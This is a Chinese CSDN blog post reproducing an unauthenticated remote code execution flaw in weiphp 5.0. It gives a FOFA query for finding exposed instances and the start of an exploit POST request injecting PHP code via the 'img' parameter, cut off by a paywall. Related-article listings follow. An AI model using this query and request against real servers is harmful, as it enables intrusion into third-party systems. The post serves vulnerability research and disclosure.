【漏洞复现】weiphp index.php 远程代码执行漏洞

已于 2024-03-12 19:47:58 修改
阅读量573 收藏 2
点赞数 20
分类专栏: 漏洞复现 文章标签: php 开发语言
于 2024-03-12 19:41:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136661175
版权
本文详细介绍了开源微信开发平台 weiphp5.0 中存在的远程代码执行漏洞,该漏洞允许未授权攻击者通过特定方式执行任意代码,从而可能完全控制服务器。文章涵盖漏洞概述、复现步骤及影响范围。
摘要由CSDN通过智能技术生成

0x01 产品简介

weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。

0x02 漏洞概述

weiphp5.0 存在远程代码执行漏洞,未授权的攻击者可以通过该漏洞进入远程代码执行,从而控制服务器。

0x03 测绘语句

fofa:body="/css/weiphp.css" && icon_hash="37052027"

0x04 漏洞复现

POST /public/index.php/weixin/Notice/index?img=echo+md5(1);exit(); HTTP/1.1

Host:

Content-Type: application/x-www-form-urlencoded



<xml>

<product_id>aaaa</product_id>

<appid
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
专栏目录
订阅专栏
weiphp5.0存在远程代码执行漏洞
nnn2188185的博客
03-11 187
weiphp5.0存在远程代码执行漏洞
漏洞复现-weiphp5.0 scan_callback代码执行漏洞
weixin_69010236的博客
03-12 419
weiphp5.0 scan_callback 存在代码执行漏洞
WeiPHP Notice/index接口处存在RCE漏洞
Keepb1ue的博客
03-14 283
WeiPHP是一款基于PHP开发的开源微信公众号开发框架。它提供了丰富的功能和易于使用的接口,使开发者能够快速构建和管理微信公众号应用。WeiPHP支持自定义菜单、消息管理、用户管理、素材管理、支付接口等功能,同时还提供了插件机制和模块化开发,方便扩展和定制。WeiPHP是一个成熟的框架,被广泛应用于微信公众号开发领域。
WeiPHP5.0远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-12 843
weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
weixin_68999845的博客
09-21 599
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 2768
web篇(php_rce)详解
攻防世界Web高手进阶区WP(1-4)
00勇士王子的博客
07-24 541
1.baby_web 题目描述中提到初始页面,一般都是 index.php 进入题目环境,可以看到是1.php 将1.php改成inex.php,然后发现页面直接跳转到1.php了 那就F12查看网页响应情况,再次访问index.php,然后发现确实访问index.php了,在返回的响应头中发现flag。 flag{very_baby_web} 2.Training-WWW-Robots 打开题目环境,一堆英文,看不懂 翻译一下 和之前新手练习区第二题一样,考察robots协议,直接访问 i
WeiPHP 微信开发平台 SQL注入漏洞复现
0xSec
12-05 1007
weiphp微信开发平台 _send_by_group、wp_where、 get_package_template等接口处存在SQL注入漏洞,攻击者利用此漏洞可获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
使用API接口创建短链接【PHP版】
weixin_43833373的博客
10-10 446
C1N短网址(c1n.cn)还提供了丰富的短链接管理的API接口,只需进行简单的接口调用,就能将稳定好用的短链接系统接入到自己的产品中,极大地降低了开发成本。上述代码中使用到的token需要前往C1N短网址(c1n.cn)-控制台-我的信息进行查询。
PHP智慧餐饮新风尚点餐系统
最新发布
2401_84593614的博客
10-10 436
总的来说,智慧餐饮新风尚点餐系统不仅为顾客带来了便捷、高效、个性化的点餐体验,也为餐厅提供了有力的运营支持。它让美食与科技实现了完美结合,让我们在享受美食的同时,也能感受到科技的魅力。如果你还没有尝试过这款点餐系统,不妨找个机会去体验一下,相信它会给你带来不一样的惊喜!
RCE+[伪协议综合]
2302_81328699的博客
10-03 571
伪协议综合
原生input实现时间选择器用法
敲代码无敌小奶龙的博客
10-08 512
原生input实现时间选择器用法
精品WordPress主题/响应式个人博客主题Kratos
2403_86698467的博客
10-05 744
主题设计简约友好,并且支持响应式,自适应访问,简seo单大方的主页构造,使得博客能在臃肿杂乱的环境中脱颖而出,Kratos内置主题设置,可设置seo关键字及站点描述页面伪静态,自定义的顶部样式(背景图 ),
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
Simon223的博客
10-04 1186
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
PHP如何解析配置文件
sheji888的专栏
10-06 797
选择哪种方法取决于你的需求和偏好。INI文件简单且易于手动编辑,而YAML和JSON文件则更适合复杂和层次化的配置结构。PHP数组文件则提供了最大的灵活性,但可能会让配置与代码混淆。无论你选择哪种方法,都要确保配置文件的安全性和可读性,特别是在生产环境中。
《SQL 注入防护+Web 应用防火墙》
jiyiwangluokeji的博客
10-06 664
这只是一些基本的配置示例,实际的配置需要根据您的服务器架构、应用类型和具体需求进行调整和优化。Web 应用防火墙(以 ModSecurity 为例)输入验证(以 Python 的 Flask 框架为例)// 假设从用户获取的输入为 $userInput。SQL 注入防护(以 MySQL 数据库为例)# 只允许字母、数字和空格。// 使用参数化查询。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值